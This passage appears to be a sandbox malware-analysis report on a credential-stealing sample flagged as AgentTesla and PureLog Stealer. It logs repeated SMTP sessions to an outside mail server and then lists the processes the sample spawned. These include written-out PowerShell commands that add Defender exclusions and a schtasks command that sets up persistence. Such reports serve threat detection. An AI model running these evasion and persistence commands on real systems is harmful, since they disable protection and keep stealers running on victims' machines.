Jan 11, 2025 09:25:22.234239101 CET | 587 | 50020 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net Ok 1736583922-LPk8NGBOnOs0
Jan 11, 2025 09:25:22.234376907 CET | 50020 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:22.467420101 CET | 587 | 50020 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:22.467592001 CET | 50020 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:22.699737072 CET | 587 | 50020 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:23.755394936 CET | 587 | 50021 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net Ok 1736583923-NPkGbIAOlSw0
Jan 11, 2025 09:25:23.755542994 CET | 50021 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:23.981525898 CET | 587 | 50021 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:23.981676102 CET | 50021 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:24.207832098 CET | 587 | 50021 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:27.876780987 CET | 587 | 50022 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net Ok 1736583927-RPk59OBOmmI0
Jan 11, 2025 09:25:27.877022028 CET | 50022 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:28.111804962 CET | 587 | 50022 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Jan 11, 2025 09:25:28.112869024 CET | 50022 | 587 | 192.168.2.4 | 77.88.21.158 | STARTTLS
Jan 11, 2025 09:25:28.341754913 CET | 587 | 50022 | 77.88.21.158 | 192.168.2.4 | 220 Go ahead
Jan 11, 2025 09:25:34.621213913 CET | 587 | 50023 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net Ok 1736583934-YPkuB6AOcW20
Jan 11, 2025 09:25:34.633673906 CET | 50023 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 377142
Jan 11, 2025 09:25:34.857601881 CET | 587 | 50023 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:34.857780933 CET50023587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:35.004719973 CET5875002477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-78.myt.yp-c.yandex.net Ok 1736583934-YPkpMt7Oi0U0
                                                                                                              Jan 11, 2025 09:25:35.080662966 CET5875002377.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:35.141849041 CET50024587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:35.368484020 CET5875002477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-78.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:35.368799925 CET50024587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:35.595659018 CET5875002477.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:36.394347906 CET5875002577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net Ok 1736583936-aPkBICBOgOs0
                                                                                                              Jan 11, 2025 09:25:36.394577026 CET50025587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:36.625226974 CET5875002577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:36.625427961 CET50025587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:36.855886936 CET5875002577.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:51.678766012 CET5875002677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-29.myt.yp-c.yandex.net Ok 1736583951-pPkcVE2OliE0
                                                                                                              Jan 11, 2025 09:25:51.693444014 CET50026587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:51.921729088 CET5875002677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-29.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:51.921901941 CET50026587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:52.977364063 CET5875002777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1736583952-qPknA38Oh8c0
                                                                                                              Jan 11, 2025 09:25:52.977566004 CET50027587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:53.206139088 CET5875002777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:53.206382990 CET50027587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:53.433656931 CET5875002777.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:04.987261057 CET5875002877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net Ok 1736583964-4QkoG8AOrW20
                                                                                                              Jan 11, 2025 09:26:04.991167068 CET50028587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:05.210743904 CET5875002877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:05.210989952 CET50028587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:05.430490017 CET5875002877.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:07.178759098 CET5875002977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net Ok 1736583967-6QkYmDAOceA0
                                                                                                              Jan 11, 2025 09:26:07.178939104 CET50029587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:07.410754919 CET5875002977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:07.410938025 CET50029587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:07.643043041 CET5875002977.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:15.678908110 CET5875003077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1736583975-FQkhjY3OmW20
                                                                                                              Jan 11, 2025 09:26:15.679153919 CET50030587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:15.900332928 CET5875003077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:15.983357906 CET50030587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:16.204453945 CET5875003077.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:22.019037008 CET5875003177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-74.vla.yp-c.yandex.net Ok 1736583981-LQkOkEBOlW20
                                                                                                              Jan 11, 2025 09:26:22.019265890 CET50031587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:22.249083996 CET5875003177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-74.vla.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:22.249583006 CET50031587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:22.479201078 CET5875003177.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:28.239857912 CET5875003277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1736583988-SQkVVOAOmSw0
                                                                                                              Jan 11, 2025 09:26:28.240025997 CET50032587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:28.464756012 CET5875003277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:28.465151072 CET50032587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:28.689874887 CET5875003277.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:38.713619947 CET5875003377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1736583998-cQkdYGBOgiE0
                                                                                                              Jan 11, 2025 09:26:38.714338064 CET50033587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:38.936347008 CET5875003377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:38.936580896 CET50033587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:39.227468014 CET5875003377.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:58.182179928 CET5875003477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net Ok 1736584018-wQkarJAOl0U0
                                                                                                              Jan 11, 2025 09:26:58.182718039 CET50034587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:58.321758032 CET5875003577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736584018-wQk4YFBOcmI0
                                                                                                              Jan 11, 2025 09:26:58.321914911 CET50035587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:58.413086891 CET5875003477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:58.413254023 CET50034587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:58.549197912 CET5875003577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:58.549354076 CET50035587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:58.643589973 CET5875003477.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:58.776812077 CET5875003577.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:05.298255920 CET5875003677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1736584025-4RkSf08OfOs0
                                                                                                              Jan 11, 2025 09:27:05.298664093 CET50036587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:05.522088051 CET5875003677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:05.522331953 CET50036587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:05.745806932 CET5875003677.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:21.648519039 CET5875003777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.myt.yp-c.yandex.net Ok 1736584041-LRkOqv7OoSw0
                                                                                                              Jan 11, 2025 09:27:21.648883104 CET50037587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:21.875782013 CET5875003777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:21.876019955 CET50037587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:22.102226973 CET5875003777.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:22.861601114 CET5875003877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1736584042-MRkRc38OgKo0
                                                                                                              Jan 11, 2025 09:27:22.874427080 CET50038587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:23.087304115 CET5875003877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:23.099958897 CET 50038 587 192.168.2.4 77.88.21.158 STARTTLS
                                                                                                              Jan 11, 2025 09:27:23.312591076 CET 587 50038 77.88.21.158 192.168.2.4 220 Go ahead
                                                                                                              Jan 11, 2025 09:27:28.855009079 CET 587 50039 77.88.21.158 192.168.2.4 220 mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net Ok 1736584048-SRkdkW6MiGk0
                                                                                                              Jan 11, 2025 09:27:28.861543894 CET 50039 587 192.168.2.4 77.88.21.158 EHLO 377142
                                                                                                              Jan 11, 2025 09:27:29.085764885 CET 587 50039 77.88.21.158 192.168.2.4 250-mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:29.086133003 CET 50039 587 192.168.2.4 77.88.21.158 STARTTLS
                                                                                                              Jan 11, 2025 09:27:29.310444117 CET 587 50039 77.88.21.158 192.168.2.4 220 Go ahead
                                                                                                              Jan 11, 2025 09:27:35.033241987 CET 587 50040 77.88.21.158 192.168.2.4 220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1736584054-YRknO3BOjGk0
                                                                                                              Jan 11, 2025 09:27:35.033478975 CET 50040 587 192.168.2.4 77.88.21.158 EHLO 377142
                                                                                                              Jan 11, 2025 09:27:35.242974997 CET 587 50041 77.88.21.158 192.168.2.4 220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1736584055-ZRkio47OriE0
                                                                                                              Jan 11, 2025 09:27:35.243159056 CET 50041 587 192.168.2.4 77.88.21.158 EHLO 377142
                                                                                                              Jan 11, 2025 09:27:35.259954929 CET 587 50040 77.88.21.158 192.168.2.4 250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:35.260090113 CET 50040 587 192.168.2.4 77.88.21.158 STARTTLS
                                                                                                              Jan 11, 2025 09:27:35.461033106 CET 587 50041 77.88.21.158 192.168.2.4 250-mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:35.461252928 CET 50041 587 192.168.2.4 77.88.21.158 STARTTLS
                                                                                                              Jan 11, 2025 09:27:35.486675978 CET 587 50040 77.88.21.158 192.168.2.4 220 Go ahead
                                                                                                              Jan 11, 2025 09:27:35.679372072 CET 587 50041 77.88.21.158 192.168.2.4 220 Go ahead


                                                                                                              Target ID:0
                                                                                                              Start time:03:23:22
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0xa60000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0x450000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                                                                                                              Imagebase:0x450000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:03:23:24
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:03:23:25
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\kAsh3nmsgs.exe"
                                                                                                              Imagebase:0x860000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Target ID:9
                                                                                                              Start time:03:23:25
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              Imagebase:0xca0000
                                                                                                              File size:835'072 bytes
                                                                                                              MD5 hash:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1769194056.0000000003039000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 79%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:03:23:27
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:11
                                                                                                              Start time:03:23:29
                                                                                                              Start date:11/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
